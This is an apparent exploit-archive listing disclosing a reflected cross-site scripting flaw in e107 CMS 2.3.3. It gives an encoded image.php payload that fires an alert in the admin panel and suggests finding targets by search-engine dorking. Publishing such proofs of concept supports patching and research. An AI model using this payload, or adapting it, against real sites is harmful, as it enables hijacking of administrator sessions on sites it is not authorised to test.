- e107 2.3.3 Cross Site Scripting
- Posted Aug 5, 2024
- Authored by indoushka
e107 version 2.3.3 suffers from a cross site scripting vulnerability.
- tags | exploit, xss
- SHA-256 |
65270fcfbc4496558285477bf858c62cce40aea1dfc36c2063fca646faa64fa5 - Download | Favorite | View
=============================================================================================================================================
| # Title : e107 v2.3.3 XSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |
| # Vendor : https://unlimited.dl.sourceforge.net/project/e107/e107/e107%20v2.3.3/e107_2.3.3_full.zip?viasf=1 |
=============================================================================================================================================poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use Payload : /image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1
[+] LOgin : http://127.0.0.1/233/e107_admin/
[+] http://127.0.0.1/233/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
File Tags
- ActiveX (933)
- Advisory (86,251)
- Arbitrary (16,849)
- BBS (2,859)
- Bypass (1,859)
- CGI (1,033)
- Code Execution (7,785)
- Conference (691)
- Cracker (844)
- CSRF (3,385)
- DoS (25,039)
- Encryption (2,389)
- Exploit (53,121)
- File Inclusion (4,258)
- File Upload (990)
- Firewall (822)
- Info Disclosure (2,888)
- Intrusion Detection (915)
- Java (3,142)
- JavaScript (896)
- Kernel (7,188)
- Local (14,791)
- Magazine (586)
- Overflow (13,166)
- Perl (1,435)
- PHP (5,221)
- Proof of Concept (2,381)
- Protocol (3,724)
- Python (1,632)
- Remote (31,640)
- Root (3,633)
- Rootkit (526)
- Ruby (631)
- Scanner (1,657)
- Security Tool (8,025)
- Shell (3,273)
- Shellcode (1,217)
- Sniffer (902)
- Spoof (2,275)
- SQL Injection (16,602)
- TCP (2,440)
- Trojan (690)
- UDP (904)
- Virus (669)
- Vulnerability (32,928)
- Web (9,955)
- Whitepaper (3,782)
- x86 (967)
- XSS (18,243)
- Other
File Archives
Systems
- AIX (429)
- Apple (2,099)
- BSD (377)
- CentOS (58)
- Cisco (1,927)
- Debian (7,087)
- Fedora (1,693)
- FreeBSD (1,246)
- Gentoo (4,534)
- HPUX (880)
- iOS (378)
- iPhone (108)
- IRIX (220)
- Juniper (69)
- Linux (50,608)
- Mac OS X (691)
- Mandriva (3,105)
- NetBSD (256)
- OpenBSD (489)
- RedHat (16,440)
- Slackware (941)
- Solaris (1,611)
- SUSE (1,444)
- Ubuntu (9,726)
- UNIX (9,433)
- UnixWare (187)
- Windows (6,668)
- Other
如有侵权请联系:admin#unsafe.sh